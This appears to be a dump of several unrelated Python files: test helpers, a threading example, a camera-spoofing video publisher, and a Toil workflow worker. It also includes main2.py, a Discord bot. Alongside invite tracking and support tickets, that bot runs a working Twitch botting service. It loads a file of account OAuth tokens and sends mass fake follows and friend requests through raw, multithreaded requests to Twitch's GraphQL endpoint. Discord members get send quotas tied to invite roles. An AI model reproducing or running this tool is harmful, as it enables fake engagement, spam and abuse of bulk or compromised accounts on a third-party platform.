while check_strings and check_strings[-1] in line:
check_strings.pop()
if not check_strings:
return
if time.time() - start > seconds:
break
time.sleep(0.05)
raise AssertionError("Waited %0.2fsecs but %s did not appear in output in the given order !" % (
seconds, check_strings
))
@contextmanager
def dump_on_error(cb):
try:
yield
except Exception:
print("*********** OUTPUT ***********")
print(cb())
print("******************************")
raise
@contextmanager
def dump_always(cb):
try:
yield
finally:
print("*********** OUTPUT ***********")
print(cb())
print("******************************")
class ProcessTestCase(unittest.TestCase):
dump_on_error = staticmethod(dump_on_error)
wait_for_strings = staticmethod(wait_for_strings)
|
main2.py
|
import keep_alive
from discord.ext import commands
import threading
import discord
import asyncio
import aiohttp
import random
import socket
import ctypes
import time
import json
import ssl
import re
import os
token = ''
prefix = '/'
intents = discord.Intents().all()
bot = commands.Bot(command_prefix=prefix, case_insensitive=True, intents=intents)
bot.remove_command('help')
bots_channel = 123456789
threads = 500 + 4
queue = []
administrator_ids = []
administrator_roles = []
roles = {
'role id': '50', # @everyone
'role id 2': '50', # +50
'role id 3': '50' # Booster
}
database = {}
invites_database = {}
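# Assumed shapes, based on the handlers below:
# database: {guild_id: {member_id: {'invites': int, 'inviter': member_id or None}}}
# invites_database: {guild_id: [(invite_code, uses), ...]} -- snapshot used to work out who invited a new member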
async def update_database():
with open('database.json', 'w') as f:
json.dump(database, f)
async def update_invites(guild):
invites = await guild.invites()
invites_database[f'{guild.id}'] = [tuple((invite.code, invite.uses)) for invite in invites]
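# Inviter detection: on_member_join compares each invite's current uses count against the cached snapshot; the invite whose count increased identifies the inviter.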
@bot.event
async def on_invite_create(invite):
await update_invites(invite.guild)
@bot.event
async def on_invite_delete(invite):
await update_invites(invite.guild)
@bot.event
async def on_member_join(member):
inviter = None
guild = member.guild
guild_invites = await guild.invites()
for guild_invite in guild_invites:
try:
for invite in invites_database.get(f'{guild.id}'):
if invite[0] == guild_invite.code:
if int(guild_invite.uses) > invite[1]:
inviter = str(guild_invite.inviter.id)
database[f'{guild.id}'][f'{inviter}']['invites'] += 1
await update_database()
break
except:
pass
await update_invites(guild)
if f'{member.id}' not in database[f'{guild.id}'].keys():
database[f'{guild.id}'][f'{member.id}'] = {'invites': 0, 'inviter': f'{inviter}'}
await update_database()
elif f'{member.id}' in database[f'{guild.id}'].keys():
invites = database[f'{guild.id}'][f'{member.id}']['invites']
database[f'{guild.id}'][f'{member.id}'] = {'invites': int(invites), 'inviter': f'{inviter}'}
await update_database()
channel = await bot.fetch_channel(bots_channel)
if database[f'{guild.id}'][f'{member.id}']['inviter'] is not None and inviter:
invites = database[f'{guild.id}'][inviter]['invites']
_50 = discord.utils.get(guild.roles, name='+50')
_inviter = await guild.fetch_member(int(inviter))
if invites >= 3 and _50 not in _inviter.roles:
await _inviter.add_roles(_50)
embed = discord.Embed(color=16083729, description=f'<@{member.id}> has joined! Invited by <@{inviter}> ({invites} invite' + ('s)' if invites != 1 else ')'))
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await channel.send(embed=embed)
else:
embed = discord.Embed(color=16083729, description=f'<@{member.id}> has joined!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await channel.send(embed=embed)
@bot.event
async def on_member_remove(member):
guild = member.guild
if database[f'{guild.id}'][f'{member.id}']['inviter'] is not None:
inviter = str(database[f'{guild.id}'][f'{member.id}']['inviter'])
database[f'{guild.id}'][inviter]['invites'] -= 1
await update_database()
await update_invites(guild)
channel = await bot.fetch_channel(bots_channel)
if database[f'{guild.id}'][f'{member.id}']['inviter'] is not None:
invites = database[f'{guild.id}'][inviter]['invites']
_50 = discord.utils.get(guild.roles, name='+50')
_inviter = await guild.fetch_member(int(inviter))
if invites < 3 and _50 in _inviter.roles:
await _inviter.remove_roles(_50)
embed = discord.Embed(color=16083729, description=f'<@{member.id}> has left! Invited by <@{inviter}> ({invites} invite' + ('s)' if invites != 1 else ')'))
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await channel.send(embed=embed)
else:
embed = discord.Embed(color=16083729, description=f'<@{member.id}> has left!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await channel.send(embed=embed)
@bot.event
async def on_message(message):
if f'{message.author.id}' not in database[f'{message.guild.id}'].keys():
database[f'{message.guild.id}'][f'{message.author.id}'] = {'invites': 0, 'inviter': None}
await update_database()
await bot.process_commands(message)
class tfollow_bot:
def __init__(self, channel_id, amount):
self.channel_id = str(channel_id)
self.amount = int(amount)
self.tokens = []
self.load_tokens()
random.shuffle(self.tokens)
def load_tokens(self):
self.tokens = open('tokens.txt', 'r').read().splitlines()
def bot(self, i):
try:
_, _, token = self.tokens[i].split(':')
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'
origin = 'https://www.twitch.tv'
content_type = 'text/plain;charset=UTF-8'
client_id = 'kimne78kx3ncx6brgo4mv6wki5h1ko'
authorization = f'OAuth {token}'
accept_language = 'en-US'
data = '[{"operationName":"FollowButton_FollowUser","variables":{"input":{"disableNotifications":false,"targetID":"%s"}},"extensions":{"persistedQuery":{"version":1,"sha256Hash":"3efee1acda90efdff9fef6e6b4a29213be3ee490781c5b54469717b6131ffdfe"}}}]' % self.channel_id
content_length = len(data)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(('gql.twitch.tv', 443))
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
s.sendall(f'POST /gql HTTP/1.1\r\nHost: gql.twitch.tv\r\nAuthorization: {authorization}\r\nUser-Agent: {user_agent}\r\nOrigin: {origin}\r\nContent-Type: {content_type}\r\nClient-Id: {client_id}\r\nAccept-Language: {accept_language}\r\nContent-Length: {content_length}\r\n\r\n{data}\r\n'.encode('utf-8'))
s.recv(4096)
except:
pass
def start(self):
for i in range(self.amount):
while True:
if threading.active_count() < threads:
threading.Thread(target=self.bot, args=(i,)).start()
break
while True:
if threading.active_count() == 4:
break
return
class tfriend_bot:
def __init__(self, channel_id, amount):
self.channel_id = str(channel_id)
self.amount = int(amount)
self.tokens = []
self.load_tokens()
random.shuffle(self.tokens)
def load_tokens(self):
self.tokens = open('tokens.txt', 'r').read().splitlines()
def bot(self, i):
try:
_, _, token = self.tokens[i].split(':')
user_agent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36'
origin = 'https://www.twitch.tv'
content_type = 'text/plain;charset=UTF-8'
client_id = 'kimne78kx3ncx6brgo4mv6wki5h1ko'
authorization = f'OAuth {token}'
accept_language = 'en-US'
data = '[{"operationName":"FriendButton_CreateFriendRequest","variables":{"input":{"targetID":"%s"}},"extensions":{"persistedQuery":{"version":1,"sha256Hash":"380d8b19fcffef2fd8654e524444055dbca557d71968044115849d569d24129a"}}}]' % self.channel_id
content_length = len(data)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
s.connect(('gql.twitch.tv', 443))
s = ssl.wrap_socket(s, ssl_version=ssl.PROTOCOL_SSLv23)
s.sendall(f'POST /gql HTTP/1.1\r\nHost: gql.twitch.tv\r\nAuthorization: {authorization}\r\nUser-Agent: {user_agent}\r\nOrigin: {origin}\r\nContent-Type: {content_type}\r\nClient-Id: {client_id}\r\nAccept-Language: {accept_language}\r\nContent-Length: {content_length}\r\n\r\n{data}\r\n'.encode('utf-8'))
_ = s.recv(4096).decode('utf-8')
resp = s.recv(4096).decode('utf-8')
if 'service error' in resp:
self.bot(i)
except:
pass
def start(self):
for i in range(self.amount):
while True:
if threading.active_count() < threads:
threading.Thread(target=self.bot, args=(i,)).start()
break
while True:
if threading.active_count() == 4:
break
return
def zoom():
while True:
try:
task = queue.pop(0).split('|')
if task[0] == 'tfollow':
tfollow_bot(task[1], task[2]).start()
elif task[0] == 'tfriend':
tfriend_bot(task[1], task[2]).start()
except:
pass
threading.Thread(target=zoom).start()
async def status():
while True:
try:
members = sum([len([member for member in guild.members if not member.bot]) for guild in bot.guilds])
activity = discord.Activity(type=discord.ActivityType.watching, name=f'{members} members!')
await bot.change_presence(activity=activity)
await asyncio.sleep(300)
except:
pass
@bot.event
async def on_ready():
bot.loop.create_task(status())
try:
with open('database.json', 'r') as f:
global database
database = json.load(f)
except:
open('database.json', 'a').close()
for guild in bot.guilds:
await update_invites(guild)
if f'{guild.id}' not in database.keys():
database[f'{guild.id}'] = {}
await update_database()
@bot.event
async def on_command_error(ctx, error: Exception):
if isinstance(error, commands.CommandNotFound):
await ctx.message.delete()
elif isinstance(error, commands.MissingRequiredArgument):
ctx.command.reset_cooldown(ctx)
embed = discord.Embed(color=16083729, description='You are missing arguments required to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
if ctx.channel.id == bots_channel: await ctx.send(embed=embed)
elif isinstance(error, commands.CommandOnCooldown):
embed = discord.Embed(color=16083729, description=f'{error}')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
if ctx.channel.id == bots_channel: await ctx.send(embed=embed)
else:
await ctx.message.delete()
@bot.command()
async def help(ctx):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}help')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
embed = discord.Embed(color=16083729)
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
embed.add_field(name='Help', value=f'`{bot.command_prefix}help`', inline=True)
embed.add_field(name='Ticket', value=f'`{bot.command_prefix}ticket`', inline=True)
embed.add_field(name='Close', value=f'`{bot.command_prefix}close`', inline=True)
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if admin_roles or ctx.author.id in administrator_ids:
embed.add_field(name='Clear', value=f'`{bot.command_prefix}clear`', inline=True)
embed.add_field(name='Update Database', value=f'`{bot.command_prefix}updatedb`', inline=True)
embed.add_field(name='Twitch Info', value=f'`{bot.command_prefix}tinfo (channel)`', inline=True)
embed.add_field(name='Twitch Followers', value=f'`{bot.command_prefix}tfollow (channel)`', inline=True)
embed.add_field(name='Twitch Friend Requests', value=f'`{bot.command_prefix}tfriend (channel)`', inline=True)
embed.add_field(name='Roblox Info', value=f'`{bot.command_prefix}rinfo (user)`', inline=True)
embed.add_field(name='Roblox Templates', value=f'`{bot.command_prefix}rget (asset)`', inline=True)
await ctx.send(embed=embed)
else:
await ctx.message.delete()
@bot.command()
async def ticket(ctx):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}ticket')
if ctx.channel.type != discord.ChannelType.private:
channels = [str(channel) for channel in bot.get_all_channels()]
if f'ticket-{ctx.author.id}' in channels:
await ctx.message.delete()
else:
ticket_channel = await ctx.guild.create_text_channel(f'ticket-{ctx.author.id}')
await ticket_channel.set_permissions(ctx.guild.default_role, send_messages=False, read_messages=False)
await ticket_channel.set_permissions(ctx.author, send_messages=True, read_messages=True, add_reactions=True, embed_links=True, attach_files=True, read_message_history=True, external_emojis=True)
embed = discord.Embed(color=16083729, description=f'Please enter the reason for this ticket, type `{bot.command_prefix}close` if you want to close this ticket.')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ticket_channel.send(f'{ctx.author.mention}', embed=embed)
await ctx.message.delete()
@bot.command()
async def close(ctx):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}close')
if ctx.channel.type != discord.ChannelType.private:
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if ctx.channel.name == f'ticket-{ctx.author.id}':
await ctx.channel.delete()
elif admin_roles and 'ticket' in ctx.channel.name or ctx.author.id in administrator_ids and 'ticket' in ctx.channel.name:
await ctx.channel.delete()
else:
await ctx.message.delete()
@bot.command()
async def clear(ctx):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}clear')
if ctx.channel.type != discord.ChannelType.private:
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if admin_roles or ctx.author.id in administrator_ids:
await ctx.channel.purge(limit=None)
await ctx.send(':zap:')
else:
await ctx.message.delete()
@bot.command()
async def updatedb(ctx):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}updatedb')
if ctx.channel.type != discord.ChannelType.private:
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if admin_roles or ctx.author.id in administrator_ids:
counter = 0
members = [member for member in ctx.guild.members if not member.bot]
for member in members:
if f'{member.id}' not in database[f'{ctx.guild.id}'].keys():
database[f'{ctx.guild.id}'][f'{member.id}'] = {'invites': 0, 'inviter': None}
await update_database()
counter += 1
embed = discord.Embed(color=16083729, description=(f'`{counter}` users added to database!' if counter != 1 else f'`{counter}` user added to database!'))
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
@bot.command()
async def tinfo(ctx, channel):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}tinfo {channel}')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
try:
async with aiohttp.ClientSession() as session:
try:
channel_lower = channel.lower()
headers = {
'Client-Id': 'abe7gtyxbr7wfcdftwyi9i5kej3jnq',
'Accept': 'application/vnd.twitchtv.v5+json'
}
async with session.get(f'https://api.twitch.tv/kraken/users?login={channel_lower}', headers=headers) as r:
r = await r.json()
channel_id = r['users'][0]['_id']
async with session.get(f'https://api.twitch.tv/kraken/channels/{channel_id}', headers=headers) as r:
r = await r.json()
name = r['display_name']
followers = r['followers']
views = r['views']
logo = r['logo']
except:
embed = discord.Embed(color=16083729, description=f'Invalid twitch channel!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
return
embed = discord.Embed(color=16083729)
embed.set_thumbnail(url=f'{logo}')
embed.add_field(name='Name', value=f'`{name}`', inline=True)
embed.add_field(name='Channel ID', value=f'`{channel_id}`', inline=True)
embed.add_field(name='Followers', value=f'`{followers}`', inline=True)
embed.add_field(name='Channel Views', value=f'`{views}`', inline=True)
await ctx.send(embed=embed)
except:
embed = discord.Embed(color=16083729, description='An error has occurred while attempting to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
@bot.command()
@commands.cooldown(1, 300, type=commands.BucketType.user)
async def tfollow(ctx, channel, amount: int=None):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}tfollow {channel}' + (f' {amount}' if amount else ''))
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
try:
max_amount = 0
member_roles = [role.id for role in ctx.author.roles]
for role in member_roles:
if f'{role}' in roles.keys():
max_amount += int(roles[f'{role}'])
member = ctx.guild.get_member(ctx.author.id)
for status in member.activities:
if isinstance(status, discord.CustomActivity):
if status.name == 'zoom':
max_amount += 25
break
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if admin_roles or ctx.author.id in administrator_ids:
tfollow.reset_cooldown(ctx)
max_amount = len(open('tokens.txt', 'r').read().splitlines())
if not amount:
amount = max_amount
elif amount > max_amount:
amount = max_amount
async with aiohttp.ClientSession() as session:
try:
channel_lower = channel.lower()
headers = {
'Client-Id': 'abe7gtyxbr7wfcdftwyi9i5kej3jnq',
'Accept': 'application/vnd.twitchtv.v5+json'
}
async with session.get(f'https://api.twitch.tv/kraken/users?login={channel_lower}', headers=headers) as r:
r = await r.json()
channel_id = r['users'][0]['_id']
except:
tfollow.reset_cooldown(ctx)
embed = discord.Embed(color=16083729, description=f'Invalid twitch channel!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
return
position = len(queue) + 1
embed = discord.Embed(color=16083729, description=f'Sending `{amount}` twitch followers to `{channel}`! (`{position}/{position}`)')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
queue.append(f'tfollow|{channel_id}|{amount}')
except:
tfollow.reset_cooldown(ctx)
embed = discord.Embed(color=16083729, description='An error has occurred while attempting to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
tfollow.reset_cooldown(ctx)
await ctx.message.delete()
@bot.command()
@commands.cooldown(1, 300, type=commands.BucketType.user)
async def tfriend(ctx, channel, amount: int=None):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}tfriend {channel}' + (f' {amount}' if amount else ''))
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
try:
max_amount = 0
member_roles = [role.id for role in ctx.author.roles]
for role in member_roles:
if f'{role}' in roles.keys():
max_amount += int(roles[f'{role}'])
member = ctx.guild.get_member(ctx.author.id)
for status in member.activities:
if isinstance(status, discord.CustomActivity):
if status.name == 'zoom':
max_amount += 25
break
admin_roles = [role for role in ctx.author.roles if role.id in administrator_roles]
if admin_roles or ctx.author.id in administrator_ids:
tfriend.reset_cooldown(ctx)
max_amount = len(open('tokens.txt', 'r').read().splitlines())
if not amount:
amount = max_amount
elif amount > max_amount:
amount = max_amount
async with aiohttp.ClientSession() as session:
try:
channel_lower = channel.lower()
headers = {
'Client-Id': 'abe7gtyxbr7wfcdftwyi9i5kej3jnq',
'Accept': 'application/vnd.twitchtv.v5+json'
}
async with session.get(f'https://api.twitch.tv/kraken/users?login={channel_lower}', headers=headers) as r:
r = await r.json()
channel_id = r['users'][0]['_id']
except:
tfriend.reset_cooldown(ctx)
embed = discord.Embed(color=16083729, description=f'Invalid twitch channel!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
return
position = len(queue) + 1
embed = discord.Embed(color=16083729, description=f'Sending `{amount}` twitch friend requests to `{channel}`! (`{position}/{position}`)')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
queue.append(f'tfriend|{channel_id}|{amount}')
except:
tfriend.reset_cooldown(ctx)
embed = discord.Embed(color=16083729, description='An error has occurred while attempting to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
tfriend.reset_cooldown(ctx)
await ctx.message.delete()
@bot.command()
async def rinfo(ctx, *, user):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}rinfo {user}')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
try:
async with aiohttp.ClientSession() as session:
try:
try:
user = int(user)
except:
async with session.get(f'http://api.roblox.com/users/get-by-username?username={user}') as r:
r = await r.json()
user = r['Id']
async with session.get(f'https://api.roblox.com/users/{user}') as r:
r = await r.json()
name = r['Username']
async with session.get(f'https://friends.roblox.com/v1/users/{user}/followers/count') as r:
r = await r.json()
followers = r['count']
async with session.get(f'https://thumbnails.roblox.com/v1/users/avatar-headshot?format=Png&isCircular=false&size=420x420&userIds={user}') as r:
r = await r.json()
img = r['data'][0]['imageUrl']
except:
embed = discord.Embed(color=16083729, description=f'Invalid roblox user!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
return
embed = discord.Embed(color=16083729)
embed.set_thumbnail(url=f'{img}')
embed.add_field(name='Username', value=f'`{name}`', inline=True)
embed.add_field(name='User ID', value=f'`{user}`', inline=True)
embed.add_field(name='Followers', value=f'`{followers}`', inline=True)
await ctx.send(embed=embed)
except:
embed = discord.Embed(color=16083729, description='An error has occurred while attempting to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
@bot.command()
async def rget(ctx, asset):
print(f'{ctx.author} | {ctx.author.id} -> {bot.command_prefix}rget {asset}')
if ctx.channel.type != discord.ChannelType.private:
if ctx.channel.id == bots_channel or ctx.author.id in administrator_ids:
try:
async with aiohttp.ClientSession() as session:
try:
async with session.get(f'https://assetdelivery.roblox.com/v1/asset?id={asset}') as r:
r = await r.text()
async with session.get(f'https://assetdelivery.roblox.com/v1/asset?id=' + re.search('id=(.*)</url>', r).group(1)) as r:
r = await r.read()
with open(f'{asset}.png', 'wb') as f:
f.write(r)
embed = discord.Embed(color=16083729)
file = discord.File(f'{asset}.png')
embed.set_image(url=f'attachment://{asset}.png')
await ctx.send(embed=embed, file=file)
except:
embed = discord.Embed(color=16083729, description=f'Invalid roblox asset!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
return
finally:
try:
os.remove(f'{asset}.png')
except:
pass
except:
embed = discord.Embed(color=16083729, description='An error has occurred while attempting to run this command!')
embed.set_thumbnail(url='https://i.imgur.com/0Tvz0G2.png')
await ctx.send(embed=embed)
else:
await ctx.message.delete()
keep_alive.keep_alive()
bot.run(token)
|
thread2.py
|
import time,threading
# With the lock, change_it() runs to completion before another thread can interrupt it
lock = threading.Lock()
balance = 0
def change_it(n):
global balance
balance = balance+n
balance = balance-n
def run_thread(n):
for i in range(100000):
lock.acquire()
try:
change_it(n)
finally:
lock.release()
t1 = threading.Thread(target=run_thread,args=(5,))
t2 = threading.Thread(target=run_thread,args=(8,))
t1.start()
t2.start()
t1.join()
t2.join()
print(balance)
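# Illustrative addition (not part of the original script): the same guarded
# update written with the lock as a context manager, which acquires and
# releases the lock automatically and is equivalent to the acquire/try/finally
# pattern used in run_thread above.
def run_thread_with(n):
    for i in range(100000):
        with lock:
            change_it(n)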
|
cameraspooferprocess.py
|
# Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import cv2
import glob
import time
from threading import Thread
from src.utils.templates.workerprocess import WorkerProcess
class CameraSpooferProcess(WorkerProcess):
#================================ INIT ===============================================
def __init__(self, inPs,outPs, videoDir, ext = '.h264'):
"""Processed used for spoofing a camera/ publishing a video stream from a folder
with videos
Parameters
----------
inPs : list(Pipe)
list of input pipes
outPs : list(Pipe)
list of output pipes (order does not matter)
videoDir : str
path to a directory with videos
ext : str, optional
the extension of the file, by default '.h264'
"""
super(CameraSpooferProcess,self).__init__(inPs,outPs)
# params
self.videoSize = (640,480)
self.videoDir = videoDir
self.videos = self.open_files(self.videoDir, ext = ext)
# ===================================== INIT VIDEOS ==================================
def open_files(self, inputDir, ext):
"""Open all files with the given path and extension
Parameters
----------
inputDir : string
the input directory absolute path
ext : string
the extension of the files
Returns
-------
list
A list of the files in the folder with the specified file extension.
"""
files = glob.glob(inputDir + '/*' + ext)
return files
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the thread of the process.
"""
thPlay = Thread(name='VideoPlayerThread',target= self.play_video, args=(self.videos, ))
self.threads.append(thPlay)
# ===================================== PLAY VIDEO ===================================
def play_video(self, videos):
"""Iterate through each video in the folder, open a cap and publish the frames.
Parameters
----------
videos : list(string)
The list of files with the videos.
"""
while True:
for video in videos:
cap = cv2.VideoCapture(video)
while True:
ret, frame = cap.read()
stamp = time.time()
if ret:
frame = cv2.resize(frame, self.videoSize)
for p in self.outPs:
p.send([[stamp], frame])
else:
break
cap.release()
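# Hypothetical usage sketch (not part of the original file). It assumes that
# WorkerProcess subclasses multiprocessing.Process, i.e. exposes start(), and
# the video directory path below is a placeholder.
if __name__ == '__main__':
    from multiprocessing import Pipe
    frameRecvP, frameSendP = Pipe(duplex=False)   # frames arrive on frameRecvP
    spoofer = CameraSpooferProcess(inPs=[], outPs=[frameSendP], videoDir='/path/to/videos')
    spoofer.start()                               # publishes [[timestamp], frame] on each output pipe
    [stamp], frame = frameRecvP.recv()            # consumer side: one timestamped frame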
|
worker.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import, print_function
from future import standard_library
standard_library.install_aliases()
from builtins import str
from builtins import map
from builtins import filter
import os
import sys
import copy
import random
import json
import tempfile
import traceback
import time
import socket
import logging
import shutil
from threading import Thread
try:
import cPickle as pickle
except ImportError:
import pickle
from toil.lib.expando import MagicExpando
from toil.common import Toil, safeUnpickleFromStream
from toil.fileStore import FileStore
from toil import logProcessContext
from toil.job import Job
from toil.lib.bioio import setLogLevel
from toil.lib.bioio import getTotalCpuTime
from toil.lib.bioio import getTotalCpuTimeAndMemoryUsage
import signal
logger = logging.getLogger(__name__)
def nextChainableJobGraph(jobGraph, jobStore):
"""Returns the next chainable jobGraph after this jobGraph if one
exists, or None if the chain must terminate.
"""
#If no more jobs to run or services not finished, quit
if len(jobGraph.stack) == 0 or len(jobGraph.services) > 0 or jobGraph.checkpoint != None:
logger.debug("Stopping running chain of jobs: length of stack: %s, services: %s, checkpoint: %s",
len(jobGraph.stack), len(jobGraph.services), jobGraph.checkpoint != None)
return None
#Get the next set of jobs to run
jobs = jobGraph.stack[-1]
assert len(jobs) > 0
#If there are 2 or more jobs to run in parallel we quit
if len(jobs) >= 2:
logger.debug("No more jobs can run in series by this worker,"
" it's got %i children", len(jobs)-1)
return None
#We check the requirements of the jobGraph to see if we can run it
#within the current worker
successorJobNode = jobs[0]
if successorJobNode.memory > jobGraph.memory:
logger.debug("We need more memory for the next job, so finishing")
return None
if successorJobNode.cores > jobGraph.cores:
logger.debug("We need more cores for the next job, so finishing")
return None
if successorJobNode.disk > jobGraph.disk:
logger.debug("We need more disk for the next job, so finishing")
return None
if successorJobNode.preemptable != jobGraph.preemptable:
logger.debug("Preemptability is different for the next job, returning to the leader")
return None
if successorJobNode.predecessorNumber > 1:
logger.debug("The jobGraph has multiple predecessors, we must return to the leader.")
return None
# Load the successor jobGraph
successorJobGraph = jobStore.load(successorJobNode.jobStoreID)
# Somewhat ugly, but check if job is a checkpoint job and quit if
# so
if successorJobGraph.command.startswith( "_toil " ):
#Load the job
successorJob = Job._loadJob(successorJobGraph.command, jobStore)
# Check it is not a checkpoint
if successorJob.checkpoint:
logger.debug("Next job is checkpoint, so finishing")
return None
# Made it through! This job is chainable.
return successorJobGraph
def workerScript(jobStore, config, jobName, jobStoreID, redirectOutputToLogFile=True):
"""
Worker process script, runs a job.
:param str jobName: The "job name" (a user friendly name) of the job to be run
:param jobStore: The job store to use
:param str jobStoreID: The job store ID of the job to be run
:param bool redirectOutputToLogFile: Redirect standard out and standard error to a log file
"""
logging.basicConfig()
##########################################
#Create the worker killer, if requested
##########################################
logFileByteReportLimit = config.maxLogFileSize
if config.badWorker > 0 and random.random() < config.badWorker:
def badWorker():
#This will randomly kill the worker process at a random time
time.sleep(config.badWorkerFailInterval * random.random())
os.kill(os.getpid(), signal.SIGKILL) #signal.SIGINT)
#TODO: FIX OCCASIONAL DEADLOCK WITH SIGINT (tested on single machine)
t = Thread(target=badWorker)
# Ideally this would be a daemon thread but that causes an intermittent (but benign)
# exception similar to the one described here:
# http://stackoverflow.com/questions/20596918/python-exception-in-thread-thread-1-most-likely-raised-during-interpreter-shutd
# Our exception is:
# Exception in thread Thread-1 (most likely raised during interpreter shutdown):
# <type 'exceptions.AttributeError'>: 'NoneType' object has no attribute 'kill'
# This attribute error is caused by the call os.kill() and apparently unavoidable with a
# daemon
t.start()
##########################################
#Load the environment for the jobGraph
##########################################
#First load the environment for the jobGraph.
with jobStore.readSharedFileStream("environment.pickle") as fileHandle:
environment = safeUnpickleFromStream(fileHandle)
for i in environment:
if i not in ("TMPDIR", "TMP", "HOSTNAME", "HOSTTYPE"):
os.environ[i] = environment[i]
# sys.path is used by __import__ to find modules
if "PYTHONPATH" in environment:
for e in environment["PYTHONPATH"].split(':'):
if e != '':
sys.path.append(e)
setLogLevel(config.logLevel)
toilWorkflowDir = Toil.getWorkflowDir(config.workflowID, config.workDir)
##########################################
#Setup the temporary directories.
##########################################
# Dir to put all this worker's temp files in.
localWorkerTempDir = tempfile.mkdtemp(dir=toilWorkflowDir)
os.chmod(localWorkerTempDir, 0o755)
##########################################
#Setup the logging
##########################################
